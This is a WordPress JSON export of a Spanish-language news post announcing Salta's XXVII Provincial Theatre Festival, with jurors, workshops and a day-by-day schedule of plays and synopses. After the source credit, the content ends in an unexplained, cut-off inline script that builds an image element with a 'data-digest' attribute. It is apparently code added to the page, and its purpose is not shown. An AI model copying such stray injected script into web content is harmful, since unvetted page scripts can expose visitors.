{"id":1789,"date":"2022-11-14T10:05:10","date_gmt":"2022-11-14T13:05:10","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1789"},"modified":"2025-08-14T00:30:16","modified_gmt":"2025-08-14T03:30:16","slug":"xxvii-fiesta-provincial-de-teatro-5-dias-de-teatro-independiente","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1789","title":{"rendered":"XXVII\u00b0 Fiesta Provincial de Teatro: 5 d\u00edas de Teatro Independiente"},"content":{"rendered":"\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#035335\"><em>Del 16 al 20 de noviembre se llevar\u00e1 a cabo, en la Ciudad de Salta, la XXVII\u00b0 Fiesta Provincial de Teatro. El INT tuvo la misi\u00f3n de acompa\u00f1ar a los grupos teatrales de la provincia, con el fin de lograr su participaci\u00f3n en la Fiesta. Como resultado, la mayor\u00eda de los elencos oriundos del interior se presentar\u00e1n en esta vig\u00e9simo s\u00e9ptima edici\u00f3n.<\/em><\/h5>\n\n\n\n<p>Con la organizaci\u00f3n de la Representaci\u00f3n de Salta del Instituto Nacional del Teatro,&nbsp;dependiente del Ministerio de Cultura de la Naci\u00f3n, en conjunto con la Secretar\u00eda de Cultura de la Provincia de Salta,&nbsp;dependiente del Ministerio de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda, esta nueva edici\u00f3n se desarrollar\u00e1 a lo largo de 5 d\u00edas de intensa actividad teatral, en la que 18 obras salte\u00f1as competir\u00e1n por representar a nuestra provincia, en la Fiesta Nacional de Teatro, el pr\u00f3ximo a\u00f1o. La Fiesta contar\u00e1, tambi\u00e9n, con el apoyo de las delegaciones salte\u00f1as de Argentores y de la Asociaci\u00f3n Argentina de Actrices y Actores.<\/p>\n\n\n\n<p>Las funciones de los elencos participantes tendr\u00e1n un costo de entrada de $500, una oportunidad ideal para disfrutar de lo mejor del Teatro salte\u00f1o. La venta de tickets estar\u00e1 habilitada dos horas antes de cada funci\u00f3n.<\/p>\n\n\n\n<p>El jurado encargado de elegir al elenco salte\u00f1o que representar\u00e1 a nuestra provincia, en la Fiesta Nacional de Teatro del 2023, estar\u00e1 conformado por Noelia Gana (por la Secretar\u00eda de Cultura de la Provincia de Salta), Daniela Mart\u00edn ((jurado nacional de calificaciones del Instituto Nacional del Teatro) y Pablo Parolo (por los participantes de la Fiesta). Para los elencos participantes habr\u00e1, adem\u00e1s, una instancia de devoluci\u00f3n, que permitir\u00e1 redimensionar las producciones en competencia bajo una mirada diversa y m\u00faltiple.<\/p>\n\n\n\n<p>En el marco de la Fiesta, se desarrollar\u00e1n tres espacios de formaci\u00f3n, cuyas inscripciones online ya est\u00e1n abiertas. Tendr\u00e1n un costo de inversi\u00f3n de $300, que se abonar\u00e1 al comienzo de cada encuentro:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Jueves 17 y viernes 18 de noviembre, de 15 a 17H: Taller-debate \u201cTeatro y regi\u00f3n: sus tensiones po\u00e9tico-territoriales\u201d, a cargo de \u00a0Mauricio Tossi, en Sala de Conferencias, Casa de la Cultura (Caseros 460) | Formulario de inscripci\u00f3n:\u00a0<a href=\"https:\/\/docs.google.com\/forms\/d\/1S9nkglXxPa0yrAIvQPjxX3_DP6b7QtrgUhPALYl9svI\/viewform?edit_requested=true\" target=\"_blank\" rel=\"noopener\">https:\/\/docs.google.com\/forms\/d\/1S9nkglXxPa0yrAIvQPjxX3_DP6b7QtrgUhPALYl9svI\/viewform?edit_requested=true<\/a><\/li><li>S\u00e1bado 19 de noviembre, 9 a 13H: Taller de Juegos Teatrales, a cargo de la Prof. Tania Ayub, en Sala \u201cMecano\u201d, Casa de la Cultura (Caseros 460) | Formulario de inscripci\u00f3n:\u00a0<a href=\"https:\/\/docs.google.com\/forms\/d\/12HZuZQWTFiHSDhe9XQp1ju4BkxOzD2nbH-fFshPA9F8\/viewform?edit_requested=true\" target=\"_blank\" rel=\"noopener\">https:\/\/docs.google.com\/forms\/d\/12HZuZQWTFiHSDhe9XQp1ju4BkxOzD2nbH-fFshPA9F8\/viewform?edit_requested=true<\/a><\/li><li>Domingo 20 de noviembre, de 9 a 13H: Seminario Intensivo para Actores de Voz y Movimiento, a cargo de Mar\u00eda Laura Laje, en Sala \u201cMecano\u201d, Casa de la Cultura (Caseros 460) | Formulario de inscripci\u00f3n:\u00a0<a href=\"https:\/\/docs.google.com\/forms\/d\/1g3kdePyk8TQv04A2OojUV--mUqBdjEeLNFYxjjteo-A\/viewform?edit_requested=true\" target=\"_blank\" rel=\"noopener\">https:\/\/docs.google.com\/forms\/d\/1g3kdePyk8TQv04A2OojUV&#8211;mUqBdjEeLNFYxjjteo-A\/viewform?edit_requested=true<\/a>\u00a0<\/li><\/ul>\n\n\n\n<p>Esta edici\u00f3n contar\u00e1, adem\u00e1s, con un reconocimiento especial a \u201cEspacio Teatro\u201d, taller y agrupaci\u00f3n teatral dirigida por Rafael Monti, que conserva su vigencia e importancia, en la Ciudad de Salta, desde 1988.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/86128-xxvii-fiesta-provincial-de-teatro-5-dias-de-teatro-independiente-20221112122246.jpg\" alt=\"\" class=\"wp-image-1790\" width=\"309\" height=\"204\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/86128-xxvii-fiesta-provincial-de-teatro-5-dias-de-teatro-independiente-20221112122246.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/86128-xxvii-fiesta-provincial-de-teatro-5-dias-de-teatro-independiente-20221112122246-300x198.jpg 300w\" sizes=\"(max-width: 309px) 100vw, 309px\" \/><\/figure><\/div>\n\n\n<p>La inauguraci\u00f3n ser\u00e1 en el hall de la Casa de la Cultura, el mi\u00e9rcoles 16 de noviembre, a las 18horas. De 17 a 8, en el mismo lugar, tendr\u00e1 lugar la acreditaci\u00f3n de los grupos participantes. El domingo 20 de noviembre, a las 22:30, se realizar\u00e1 el ccto de Cierre, en la sala \u201cMecano\u201d de la Casa de la Cultura, en el que se har\u00e1 el anuncio de los ganadores de la Fiesta.<\/p>\n\n\n\n<p>A continuaci\u00f3n, la programaci\u00f3n de la XXVII\u00aa Fiesta Provincial de Teatro que puede consultarse, tambi\u00e9n, en\u00a0<a href=\"http:\/\/www.fiestadelteatrosalta.com.ar\/\" target=\"_blank\" rel=\"noopener\">http:\/\/www.fiestadelteatrosalta.com.ar<\/a><\/p>\n\n\n\n<p><strong>Mi\u00e9rcoles 16 de noviembre<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>11 horas: En adhesi\u00f3n, \u201cEl Teatro Llega Al Toro\u201d, en escuelas de la Quebrada del Toro | Corredor Teatral, desde la Escuela Don Augusto Carlos Torino N\u00b0 4490, del Paraje Ingeniero Maury, hasta Las Cuevas | Cuentacuentos realizado por Cecilia Sanmill\u00e1n, en el marco del Plan de Fomento del I.N.T. \u201cLa Provincia en la Fiesta\u201d, que aspira a que ni\u00f1os y dem\u00e1s habitantes de distintos parajes disfruten de la felicidad que brinda el Teatro<\/li><li>18:30 horas&nbsp;Grupo en competencia \u201cHEBRA\u201d presenta \u00abMitos y Leyendas del NOA\u00bb (autor: Santiago Urrea), en Sala \u201cMecano\u201d, Casa de la Cultura (Caseros 460) | G\u00e9nero: Drama fant\u00e1stico | Apto para todo p\u00fablico | Entrada gral.: $500 | Sinopsis: Los mitos del Norte Argentino palpitan en cinco historias. La primera de ellas, es \u201cLa madre de los r\u00edos\u201d, que se transforma en agua salvando as\u00ed la sequ\u00eda de su pueblo. Luego nos trasladamos a la cordillera con el \u201cCoquena\u201d que juega hasta que recuerda que es un dios de la naturaleza. Le sigue el testimonio del mismo \u201cUcumar\u201d quien revela c\u00f3mo se gest\u00f3 su historia y el amor de quien lo engendr\u00f3. El pen\u00faltimo mito es \u201cLa Ciudad de Esteco\u201d, donde el narrador reconstruye la historia de la mujer que se transform\u00f3 en piedra. La \u00faltima leyenda es la del \u201cFamiliar\u201d, en la que el ilustre personaje, devorador de peones en los ingenios tabacaleros, se hace presente.<\/li><li>19:30 horas:&nbsp;&nbsp;Grupo en competencia \u201cARPI Teatro\u201d presenta \u00abAmel\u00ed (Historias de Cabaret)\u00bb (autor: Omar Pizzorno), en el Sal\u00f3n Audit\u00f3rium \u201cDr. Rafael Villagr\u00e1n\u201d (Av. Belgrano 1349) | G\u00e9nero Comedia | Apto para p\u00fablico adulto | Entrada gral.: $500 | Sinopsis: Una chica del interior se va a vivir a la gran ciudad, buscando un destino para ser rica y famosa. Logra conseguir trabajo como \u201cchica de coro\u201d en el Cabaret Moulin Vert. All\u00ed se convierte en amante de Don Jacobo, due\u00f1o del cabaret, de quien es tambi\u00e9n su gran colaboradora y confidente. Se hace amiga de la primera vedette, Amelia, adoptando su nombre, aunque le dicen Amel\u00ed, para diferenciarla. Por esas cosas del destino llega a ser due\u00f1a y madama de dicho cabaret, despu\u00e9s de pasar por muchos divertidos e inesperados incidentes.<\/li><li>21horas:&nbsp;Grupo en competencia \u00abGenio y Figura\u00bb presenta \u201cEl Maestro Jardinero\u201d (autor: Enrique Marini), en \u201cPorques\u00ed\u201d, Casa Cultural\u201d (Anzo\u00e1tegui 748) | G\u00e9nero: Comedia dram\u00e1tica | Apto para p\u00fablico joven y adulto | Entrada gral.: $500 | Sinopsis: El sesent\u00f3n Mat\u00edas inicia los tr\u00e1mites para cambio de g\u00e9nero, mientras su pensionista Federico, un joven del interior de la provincia, se recibe de Profesor de Educaci\u00f3n Inicial (\u00abMaestro Jardinero\u00bb) e intenta insertarse en el sistema educativo. Los prejuicios, la burocracia y la incomprensi\u00f3n les hacen pasar una serie de peripecias, lo que provoca que ambos tomen dr\u00e1sticas decisiones.<\/li><li>21:30 horas: Espect\u00e1culo en adhesi\u00f3n, en Met\u00e1n: Cierre del Taller de Expresi\u00f3n Corporal \u201cMEP Teatro\u201d del Plan de fomento \u00abLa Provincia en la Fiesta\u00bb: espect\u00e1culo de Teatro Danza y Folklore, en Escuela Vitt Dance (Rivadavia esq. Santa F\u00e9, San Jos\u00e9 de Met\u00e1n).<\/li><li>22 horas: Grupo en competencia \u00abSin Papeles\u00bb presenta \u201cPapitas Gratis\u201d (autora: Lilian Tupac Latriglia), \u201cLa Ventolera\u201d, espacio de arte (O\u2019Higgins 585) | G\u00e9nero: Humor negro | Apto para p\u00fablico adulto | Entrada gral.: $500 | Sinopsis: Un hombre com\u00fan y corriente, arrastrado por el \u00edmpetu de las circunstancias y la cotidianeidad, s\u00fabitamente se ve envuelto en un amargo conflicto, el cual le obliga a interpelar -en soledad- las capas m\u00e1s profundas y abyectas de la realidad, iniciando de este modo un sombr\u00edo viaje interior, tal vez sin retorno.<\/li><\/ul>\n\n\n\n<p><strong>Jueves 17 de noviembre<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>18:30 horas:&nbsp;Grupo en competencia \u201cAkilla\u201d presenta \u201cCitas de Amor\u201d (autor: Rogelio Borra Garc\u00eda), en Sala \u201cWayar Ted\u00edn\u201d del Centro Cultural Am\u00e9rica (Mitre 23) | G\u00e9nero: Drama | Apto para p\u00fablico adulto | Entrada gral.: $500 | Sinopsis: Mujeres que trabajan en un burdel hablan de sus experiencias de vida, del amor, de los hombres y la esperanza. La obra nos plantea una bella y cruda historia sobre la capacidad del mundo femenino, la resiliencia y la superaci\u00f3n, y nos presenta a tres mujeres que tras vivir el dolor, la discriminaci\u00f3n y la falta de posibilidades en una sociedad machista tienen el valor y el coraje de renacer y enfrentar la vida con entereza. El texto nos invita reflexionar sobre una realidad cotidiana de todas las \u00e9pocas, en que las mujeres han debido afrontar violencia, asumir su grandeza y correr riesgos para llevar adelante sus ideales, en una sociedad dise\u00f1ada para ocultar su potencial y su energ\u00eda.<\/li><li>20 horas: Grupo en competencia \u201cAlas &#8211; Teatro Comunitario\u201d presenta \u201cAsentamiento 360\u00b0\u201d (autor: Cristian Villarreal), en Pje. Banderas Argentinas (entre Ciudad del Rosario y Samuel Quevedo, de Ampliaci\u00f3n Villa Juanita) | G\u00e9nero: Drama | Apto para todo p\u00fablico | Entrada gral.: $500 | Sinopsis: Historias complejas han sobrevivido a la lucha sin par para esta creaci\u00f3n. Pan, tierra y trabajo transversalizan todo este entramado que se cuenta colectivamente. Tomando como elemento fundamental la lucha por la vivienda digna. As\u00ed entonces ALAS sigue rompiendo esquemas, dise\u00f1ando m\u00e1s all\u00e1 de la adversidad, construyendo colectivamente junto al amor de sus actores. Con nuestra obra \u201cAsentamiento 360\u201d, no solo queremos contarte nuestra historia, queremos romper prejuicios, queremos descentralizar el arte, hacerlo un derecho para todas las personas, queremos mostrarte que si estamos unidos y trabajamos en comunidad, nuestras carencias pueden convertirse en riqueza. Adem\u00e1s queremos que nos mires a los ojos, nos entiendas y puedas disfrutar de un espect\u00e1culo diferente.<\/li><li>21 horas: Grupo en competencia \u201cCuerpes, Movimiento Experimental\u201d presenta \u201cTomar(te)\u201d (autor: Exequiel Ramos), en Sala \u201cMecano\u201d, Casa de la Cultura (Caseros 460) | G\u00e9nero: Danza Teatro | Apto para p\u00fablico adulto | Entrada gral.: $500 | Sinopsis: Tres j\u00f3venes. Cuerpes, espejos de v\u00ednculos. Una interioridad lxs re\u00fane: el extra\u00f1amiento. Vidas fragmentadas en un espacio abierto, donde los estados son gu\u00edas y protagonistas. Perforar, atravesar una historia, todo se vuelve extra\u00f1o: la memoria. La carpa para tres que se hace una: incertidumbre.<\/li><li>22:30 horas: Grupo en competencia \u201cG.I.T. (Grupo de Investigaci\u00f3n Teatral)\u201d presenta \u201cPluma y la Tempestad\u201d (autor: Ar\u00edstides Vargas), en Sala \u201cMitad del Pasillo\u201d (Alvarado 147) | G\u00e9nero: Drama | Apto para p\u00fablico joven y adulto | Entrada gral.: $500 | Sinopsis: Pluma nace de manera m\u00e1gica en un hogar m\u00edsero, mientras sus padres duermen. Nace sin referentes, crece violentamente y, violentamente, se fuga de su casa. A partir de entonces se encontrar\u00e1 con personas reales, pero su energ\u00eda desordenada no tendr\u00e1 lugar en el orden de un mundo que no la contiene: continuamente transgrede ese mundo, no porque est\u00e9 en desacuerdo con \u00e9l, sino porque ese mundo se sostiene de pilares que no son m\u00e1s leg\u00edtimos que lo que Pluma siente en relaci\u00f3n al mundo. Decimos sentir porque pluma no tiene un discurso sobre su desobediencia, est\u00e1 en desacuerdo, pero no puede explicar por qu\u00e9 arremete contra los hombres, no con un sentido de destrucci\u00f3n sino de reclamo, porque de alguna manera est\u00e1 hu\u00e9rfana de razones para vivir en un mundo de hombres extraviados. Pluma nos dice que debemos aprender a sostenernos en el aire, a\u00fan en estos tiempos de tempestad. Hasta que La tempestad cese y suavemente nos posamos sobre una idea como una PLUMA.<\/li><\/ul>\n\n\n\n<p><strong>Viernes 18 de noviembre<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>10 horas: Mesa Panel: \u00abCreadores del Destino\u00bb, con la moderaci\u00f3n de Exequiel Ramos, en Sala \u201cWayar Ted\u00edn\u201d, Centro Cultural Am\u00e9rica (Mitre 23) | Sin costo de entrada | Esta mesa re\u00fane a artistas que est\u00e1n desarrollando sus primeros a\u00f1os dentro de las artes esc\u00e9nicas en la Provincia de Salta. J\u00f3venes que han decidido atravesar las tan complejas etapas de la producci\u00f3n art\u00edstica, en el \u00e1mbito alternativo. El encuentro ser\u00e1 una instancia de reflexiones en torno a las artes esc\u00e9nicas en el \u00e1mbito independiente: la singularidad y los modos en los procesos de creaci\u00f3n de artistas de Salta.<\/li><li>17 horas: Presentaci\u00f3n del libro de la Editorial INTeatro: \u201cAntolog\u00eda de Teatro Argentino en la Posdictadura. Nodos Interregionales (1983-1992)\u201d, Mauricio Tossi Compilador, en Sala de Conferencias, Casa de la Cultura (Caseros 460) | Sin costo de entrada.<\/li><li>18:30 horas: Grupos en competencia \u201cBizcochito Show\u201d y \u201cMeta Animate Salta\u201d presentan \u201cUn Viaje Infinito\u2026\u201d (autor: Jos\u00e9 Luis Zenteno), en Sala \u201cWayar Ted\u00edn\u201d, Centro Cultural Am\u00e9rica (Mitre 23) | G\u00e9nero: Clown &#8211; Comedia | Apto para todo p\u00fablico | Entrada gral.: $500 | Sinopsis: Un viaje infinito cuenta las circunstancias que vive Bizcochito, un clown torpe y enamorado. Este personaje emprende un viaje largo en tren para encontrarse con una amada que conoci\u00f3 en plena pandemia. \u00bfLograr\u00e1 encontrarse con su amor? Esta obra invita a jugar a todo el p\u00fablico.<\/li><li>19:30 horas: Grupo en competencia \u201cPutas Esc\u00e9nicas Organizadas\u201d presenta \u201cEsto Es para Vos que ni siquiera Vas a Venir\u201d (autora: Sof\u00eda L\u00f3pez Fleming), en Sala \u201cMecano\u201d, Casa de la Cultura (Caseros 460) | G\u00e9nero: Danza Teatro | Apto para p\u00fablico adulto | Entrada gral.: $500 | Sinopsis: Seis cuerpos se arrojan al vac\u00edo. No pueden escapar de su alma. La desnudan para vos&#8230; Almas peludas, rotas, hiperlaxas, movedizas, llenas de cicatrices, hinchadas de bronca y placer, almas chistosas, risue\u00f1as, almas obscenas, carnosas, h\u00famedas, huesudas y filosas. Filosas como el riesgo de que no vayas, filosas como todo lo que es verdad. Porque est\u00e1 obra es m\u00e1s real que la vida. Fuera de escena mentimos.<\/li><li>21 horas: Grupo en competencia \u201cCardumen Teatro\u201d presenta \u201cFuego y Zonda. Lo que Trae la Chapanay\u201d (autores: Gustavo Vergara, Flavia Salim y Marcos Arano), en \u201cPorques\u00ed\u201d Casa Cultural (Anzo\u00e1tegui 748) | G\u00e9nero: Comedia | Apto para todo p\u00fablico | Entrada gral.: $500 | Sinopsis: Fuego y Zonda, dos clowns, intentan desentra\u00f1ar la historia de la legendaria Martina Chapanay. Entre leyendas y relatos orales, se aventuran a darle vida a una figura poco conocida y a quien se la llam\u00f3 \u201cla bandolera de los llanos\u201d. Enredados en las contradicciones pol\u00edticas de la \u00e9poca, en los entreveros de montoneras, intentan entender las luchas entre unitarios y federales que marcaron el sangriento siglo XIX de nuestro pa\u00eds. Fuego y Zonda le dan vida a varios personajes como Facundo Quiroga, Chacho Pe\u00f1aloza, Irraz\u00e1bal, Sarmiento y Mitre, para comprender junto al p\u00fablico c\u00f3mo era Martina Chapanay y porqu\u00e9 la historiograf\u00eda oficial olvid\u00f3 durante mucho tiempo a una de las grandes mujeres de nuestra historia.<\/li><li>22:30 horas: Grupo en competencia \u201cMaTeatro\u201d presenta \u201cHotel Otelo\u201d (autor: Leonardo Pilili), en el Sal\u00f3n Audit\u00f3rium \u201cDr. Rafael Villagr\u00e1n\u201d (Av. Belgrano 1349) | G\u00e9nero: Comedia | Apto para p\u00fablico adulto | Entrada gral.: $500 | Sinopsis: Una noche de tormenta. No, una tempestad durante la noche. Si, de esas que son la situaci\u00f3n perfecta para que ocurra algo terrible. Un hotel de cuartos transitorios, o telo de pueblo chico, de esos en donde la gente es una mierda, atrapa a cuatro piezas fundamentales para que se produzca \u00bfUn encuentro? \u00bfUna venganza? \u00bfUna tragedia? \u00bfO todo es solo un juego? \u2026 de palabras\u2026<\/li><\/ul>\n\n\n\n<p><strong>S\u00e1bado 19 de noviembre<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>10:30 a 12:30 horas: \u201cCaja de Herramientas\u201d | Charla para interesados en interiorizarse acerca de las convocatorias del I.N.T. y sobre los Derechos de Autor, en Sala de Conferencias, Casa de la Cultura (Caseros 460) | Sin costo de entrada<\/li><li>16 a 22 horas: Stand de Editorial INTeatro \u201c20 a\u00f1os\u201d y Argentores, en el Hall de la Casa de la Cultura (Caseros 460)<\/li><li>16:00 horas:&nbsp;Reconocimiento al Taller \u201cEspacio Teatro\u201d y su Director, Rafael Monti, en Sala \u201cJuan Carlos D\u00e1valos\u201d, Casa de la Cultura (Caseros 460) | Sin costo de entrada<\/li><li>17:30 horas: &nbsp;Jornada Teatral Circense al Aire Libre, en el Anfiteatro \u201cLos Chalchaleros\u201d, de la Usina Cultural (Espa\u00f1a esq. Juramento) | Espect\u00e1culos aptos para todo p\u00fablico, con entrada libre y gratuita | Se presentar\u00e1n las obras: 17:30H, \u00abCirco Criollo\u00bb (autora: Ana L\u00eda Garc\u00eda Villalba), del Circo \u201cAruna\u201d; 18:30H, \u00abDesafiando el peligro\u00bb (autores: Vanesa Wainstein y Ra\u00fal Rodr\u00edguez), del &nbsp;Circo \u201cJulivan\u201d; 19:30H \u00abPelotas al Ataque\u00bb (autor: Fidel Rojas), del Grupo \u201cLos Pelotas\u201d; y 20:30H \u00abLos Changos Brothers ATR\u00bb (autor: Ramiro Medina) del grupo hom\u00f3nimo.<\/li><li>18:30: horas:&nbsp;&nbsp;Grupo en competencia \u201cA Puro Teatro\u201d (de Cafayate) presenta \u201cLa L\u00ednea. Ciclo-timia\u201d (autora: Mar\u00eda Laura Laje), en el Sal\u00f3n Audit\u00f3rium \u201cDr. Rafael Villagr\u00e1n\u201d (Av. Belgrano 1349) | G\u00e9nero Tragicomedia | Apto para p\u00fablico adulto | Entrada gral.: $500 | Sinopsis: \u00bfQu\u00e9 sentimos mujeres y disidencias en situaciones d\u00f3nde los l\u00edmites entre la realidad y lo no real se desdibujan? Identidad, abuso de poder, miedos&#8230; Dram\u00e1ticamente, por momentos, a veces con humor, estos y otros temas se visibilizar\u00e1n en esta apuesta teatral. La l\u00ednea. Dori es una persona trans, que debido a un incidente termina solicitando ayuda en un neuropsiqui\u00e1trico donde una serie enredos y confusiones, la disponen a caer en una trampa.<\/li><li>19:30 horas: Grupo en competencia \u201cLa Faranda\u201d presenta \u00abUna Aventura Flaut\u00e1stica\u00bb (autores: Claudia Pe\u00f1a y Fernando Arancibia), en Sala \u201cMacacha G\u00fcemes\u201d, la Usina Cultural (Espa\u00f1a esq. Juramento) | G\u00e9nero: Teatro de T\u00edteres | Apto para todo p\u00fablico | Entrada gral.: $500 | Sinopsis: \u00abUna aventura flaut\u00e1stica\u00bb es una obra basada en la \u00f3pera \u00abLa Flauta M\u00e1gica\u00bb de W. A. Mozart. En la puesta en escena hay t\u00edteres mec\u00e1nicos, t\u00edteres de manipulaci\u00f3n directa y m\u00e1scaras. La historia se desarrolla en un universo fant\u00e1stico donde Sarastro y La Reina de la Noche mantienen una batalla eterna, cuyas consecuencias sufrir\u00e1n el resto de los personajes. Papageno, Tamino, Pamina, seres encantadores que deber\u00e1n superar duras pruebas: ataques de monstruos, viajes peligrosos, destrucci\u00f3n&#8230; Pero hay una asombrosa flauta y un final incre\u00edble, vibrante como la m\u00fasica del genio Mozart. Esta vez La Faranda cuenta con m\u00fasica interpretada por j\u00f3venes m\u00fasicos: Sim\u00f3n, Celina y Santiago Seghezzo. Ellos ejecutan viol\u00edn, clarinete, fagot, glockenspiel y piano. La adaptaci\u00f3n y los arreglos fueron hechos por Sim\u00f3n. Es un espect\u00e1culo para toda la familia, con una historia atrapante, bellas im\u00e1genes, humor, suspenso, personajes adorables y un broche de oro: \u00a1la maravillosa m\u00fasica de Mozart!<\/li><\/ul>\n\n\n\n<p>20:30 horas: Grupo en competencia \u201cEl Laberinto\u201d (de Gral. G\u00fcemes) presenta \u201cComo el Clavel del Aire\u201d (autora: Elo\u00edsa Tarruela), en Sala \u201cMecano\u201d, Casa de la Cultura (Caseros 460) | G\u00e9nero: Tragicomedia | Apto para p\u00fablico adulto | Entrada gral.: $500 | Sinopsis: La obra se desarrolla en dos espacios temporales: el a\u00f1o de inicio del Golpe C\u00edvico Militar del \u201876 y la \u00e9poca m\u00e1s actual de Neoliberalismo, 2017. Trata el tema de la memoria, la resistencia y la hermandad de cuatro mujeres y el AMOR entre ellas en sus diferentes manifestaciones (Hermanas, amantes, amigas). Dos tiempos que se fusionan mostrando la vida de Sara perseguida por la Dictadura, Olivia presionada para dejar su casa por un mega negocio entre una constructora y el municipio y una abogada (Paula) que va generando un v\u00ednculo de empat\u00eda y amistad con Olivia.<\/p>\n\n\n\n<p>22 horas: Grupos en competencia \u201cLas Cremonas\u201d y \u201cEl Cuenco Teatro\u201d presentan \u201cNunca Nadie Muri\u00f3 de Amor, Excepto Alguien Alguna Vez\u201d (autor: Ricardo Ryser), en \u201cLa Ventolera\u201d, Espacio de Arte (O\u2019Higgins 585) | G\u00e9nero: Comedia Dram\u00e1tica | Apto para p\u00fablico adulto | Entrada gral.: $500 | Sinopsis: La gente com\u00fan no comprende lo complejo de estar quemado, piensan que es una muerte horrible. Lo horrible es seguir estando vivo. Con un ritmo vertiginoso y una pizca de humor negro, dos mujeres construyen y se relacionan en un mundo basado en la crueldad. No la simple maldad. Va m\u00e1s all\u00e1 de eso. Quemadas por el amor y el ardor, ponen en evidencia las formas m\u00e1s crueles de relacionarse y sobrevivir, por no hacer aquello que les est\u00e1 destinado a hacer: morir.<\/p>\n\n\n\n<p>22 horas:&nbsp;Funci\u00f3n teatral en adhesi\u00f3n, del Grupo \u201cKtarsis\u201d (de El Carril), que presenta \u201cMe Gan\u00e9 la Loter\u00eda\u201d (autor: Ricardo Lobos), en Sala \u201cJuan Carlos D\u00e1valos\u201d, Casa de la Cultura (Caseros 460) | G\u00e9nero: Comedia | Apto para p\u00fablico adulto | Entrada gral.: $300 | Sinopsis: Juan es mozo en una empresa importante de su pueblo, Pochi es trabajadora independiente, dedic\u00e1ndose a la venta de cosm\u00e9ticos por cartilla, son una pareja que llevan 18 a\u00f1os de casados y sin hijos, una buena relaci\u00f3n en la que a veces aparece la intolerancia. Juan descubre que es el ganador del premio mayor de la loter\u00eda y decide renunciar a su empleo, a partir de all\u00ed se desencadenan diferentes sucesos.<\/p>\n\n\n\n<p><strong>Domingo 20 de noviembre<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>10:30 a 12:30 horas: \u00a0\u201cCaja de Herramientas\u201d | Charla para interesados en interiorizarse acerca de las posibilidades que ofrece el Fondo Ciudadano de la Secretar\u00eda de Cultura de la Provincia de Salta y sobre las actividades de la Asociaci\u00f3n Argentina de Actrices y Actores, en Sala de Conferencias, Casa de la Cultura (Caseros 460) | Sin costo de entrada<\/li><li>15 a 21 horas:\u00a0Stand de Editorial INTeatro \u201c20 a\u00f1os\u201d y Argentores, en el Hall de la Casa de la Cultura (Caseros 460)<\/li><li>15 horas: Encuentro con el Teatro del Territorio Provincial, en Sala de Conferencias, Casa de la Cultura (Caseros 460) | Participar\u00e1n grupalidades de Cafayate, El Carril, Gral. G\u00fcemes, Met\u00e1n, R. de la Frontera, R. de Lerma y San Carlos | Est\u00e1n invitados todos aquellos y aquellas que quieran sumarse a este espacio de reflexi\u00f3n trabajo y proyecci\u00f3n | Sin costo de entrada<\/li><li>19 horas: Grupo en competencia \u201cTa-Teatro\u201d presenta \u201cTerapia, Comedia en Tres Sesiones y Un Diagn\u00f3stico\u201d (autor: Mart\u00edn Giner), en Sal\u00f3n Audit\u00f3rium \u201cDr. Rafael Villagr\u00e1n\u201d (Av. Belgrano 1349) | G\u00e9nero: Comedia | Apto para p\u00fablico adulto | Entrada gral.: $500 | Sinopsis: Un consultorio. Dos personajes. Una doctora con un gran dominio en temas relacionados a la psiquis humana y un paciente muy pintoresco con un complejo de Edipo tan grande que hasta el mismo Edipo se sorprender\u00eda. El paciente poco a poco en cada sesi\u00f3n ir\u00e1 sacando de sus casillas a esta doctora muy resistente al desborde. En medio de un desfile, situaciones desopilantes y un secreto por descubrir&#8230; estos dos personajes nos invitar\u00e1n a preguntarnos una y otra vez \u00bfQu\u00e9 tan cuerdos estamos?<\/li><li>20:30 horas: Grupo en competencia \u201cCaleidoscopio Teatro\u201d (de Rosario de la Frontera) presenta \u201cLa Nieve Es Un Lugar\u201d (autor: Gonzalo Hern\u00e1ndez Sanjorge), en Sala \u201cWayar Ted\u00edn\u201d, Centro Cultural Am\u00e9rica (Mitre 23) | G\u00e9nero: Comedia Dram\u00e1tica | Apto para todo p\u00fablico | Entrada gral.: $500 | Sinopsis: El olvido y la soledad son el eje principal de esta emotiva trama en la que dos artistas de circo, perdidos en sus creencias, encuentran refugio en el hogar de un soldado abandonado, que se valdr\u00e1 de las m\u00e1s descabelladas artima\u00f1as para hacerse de compa\u00f1\u00eda.<\/li><li>21:30 horas: Funci\u00f3n teatral en adhesi\u00f3n, del Grupo \u201cTeatro de Altura\u201d (de San Carlos), presenta \u201cEva Baila Sola\u201d (autora: Monserrat Lla\u00f3), en Sala \u201cMecano\u201d, Casa de la Cultura (Caseros 460) | G\u00e9nero: Mon\u00f3logo, Teatro Perform\u00e1tico y Jam de Dibujo | Apto para p\u00fablico joven y adulto | Entrada libre y gratuita | Sinopsis: La propuesta presenta un workingprogress, o avance del trabajo en proceso, de la obra \u2018Eva baila sola\u2019. Es una pieza que propone combinar el teatro perform\u00e1tico y corporal con dibujo y modelo vivo.<\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 